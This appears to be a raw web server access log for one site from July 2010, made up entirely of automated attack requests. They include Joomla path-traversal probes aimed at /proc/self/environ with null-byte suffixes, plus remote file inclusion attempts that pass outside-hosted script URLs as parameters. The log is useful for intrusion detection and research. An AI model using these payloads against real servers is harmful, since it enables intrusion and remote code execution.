94.23.215.207 - - [30/Jul/2010:21:05:48 -0700] "GET /logs/access_100616.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:05:48 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:05:49 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:06:03 -0700] "GET /logs/access_100529.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:06:14 -0700] "GET /logs/access_100705.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:06:17 -0700] "GET /logs/access_100614.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:06:17 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:06:17 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:06:38 -0700] "GET /logs/access_100529.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:44 -0700] "GET /logs/access_100627.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:44 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:45 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:45 -0700] "GET /logs/access_100628.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:06:46 -0700] "GET /logs/access_100704.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:06:47 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:06:47 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:52 -0700] "GET /logs/access_100627.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:52 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:06:53 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:07:20 -0700] "GET /logs/access_100615.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:07:23 -0700] "GET /logs/access_100615.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:07:51 -0700] "GET /logs/access_100614.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:27 -0700] "GET /logs/access_100704.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:28 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:28 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:08:31 -0700] "GET /logs/access_100615.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:08:31 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:08:31 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:31 -0700] "GET /logs/access_100704.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:32 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:08:32 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:09:45 -0700] "GET /logs/access_100628.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:15:18 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:15:46 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:15:46 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:15:46 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
62.93.185.48 - - [30/Jul/2010:21:15:58 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:16:00 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:16:00 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:16:01 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:16:41 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:16:42 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:16:44 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:16:44 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:16:45 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:19:08 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:19:40 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:19:40 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:20:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:20:07 -0700] "GET /logs/access_100616.log//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:20:07 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
62.93.185.48 - - [30/Jul/2010:21:20:17 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.brianwinterman.com"
62.93.185.48 - - [30/Jul/2010:21:20:18 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.brianwinterman.com"
62.93.185.48 - - [30/Jul/2010:21:20:18 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:08 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:08 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:08 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:21:13 -0700] "GET /logs/access_100627.log//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:14 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:15 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:21:15 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
125.141.91.138 - - [30/Jul/2010:21:21:20 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
125.141.91.138 - - [30/Jul/2010:21:21:20 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
125.141.91.138 - - [30/Jul/2010:21:21:20 -0700] "GET /logs/access_100616.log%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:21:22 -0700] "GET /logs/access_100705.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:21:23 -0700] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:21:23 -0700] "GET /logs//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
125.141.91.138 - - [30/Jul/2010:21:21:51 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
125.141.91.138 - - [30/Jul/2010:21:21:52 -0700] "GET /logs/access_100616.log%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:24:37 -0700] "GET /logs/access_100615.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:24:37 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:24:38 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:25:43 -0700] "GET /logs/access_100615.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:25:43 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:25:44 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:26:06 -0700] "GET /logs/access_100616.log%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:26:06 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
77.232.66.11 - - [30/Jul/2010:21:26:06 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:26:11 -0700] "GET /logs/access_100615.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:26:11 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
95.131.68.185 - - [30/Jul/2010:21:26:12 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
62.93.185.48 - - [30/Jul/2010:21:28:01 -0700] "GET /logs/access_100703.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:15 -0700] "GET /logs/access_100615.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:15 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:15 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
222.236.47.182 - - [30/Jul/2010:21:28:23 -0700] "GET /index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:28:30 -0700] "GET /logs/access_100703.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:21:28:31 -0700] "GET /logs/access_100703.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
78.41.233.128 - - [30/Jul/2010:21:28:36 -0700] "GET /logs/access_100703.log//index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:53 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:53 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:28:53 -0700] "GET /logs/access_100615.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:29:00 -0700] "GET /logs/access_100614.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:29:00 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:29:00 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:29:05 -0700] "GET /logs/access_100616.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
83.216.190.83 - - [30/Jul/2010:21:30:52 -0700] "GET /logs//?basepath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.brianwinterman.com"
83.216.190.83 - - [30/Jul/2010:21:30:52 -0700] "GET /?basepath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "www.brianwinterman.com"
83.216.190.83 - - [30/Jul/2010:21:30:52 -0700] "GET /logs/access_100615.log//?basepath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:31:12 -0700] "GET /logs/access_100614.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:31:12 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:31:13 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.217.175 - - [30/Jul/2010:21:31:17 -0700] "GET /logs/access_100616.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:32:11 -0700] "GET /logs/access_100625.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:32:11 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:32:14 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:32:16 -0700] "GET /logs/access_100615.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:32:17 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:32:18 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
178.63.53.120 - - [30/Jul/2010:21:32:33 -0700] "GET /logs/access_100629.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
94.23.215.207 - - [30/Jul/2010:21:32:46 -0700] "GET /logs/access_100616.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:34:04 -0700] "GET /logs/access_100615.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:34:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:34:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:34:57 -0700] "GET /logs/access_100529.log//index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:34:57 -0700] "GET /index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:34:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:35:00 -0700] "GET /index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:35:00 -0700] "GET /logs/access_100529.log//index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:21:35:00 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://203.252.71.232/~edugraduate/data/file/sub3_3/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
217.16.18.219 - - [30/Jul/2010:21:35:11 -0700] "GET /logs/access_100616.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:21:35:12 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
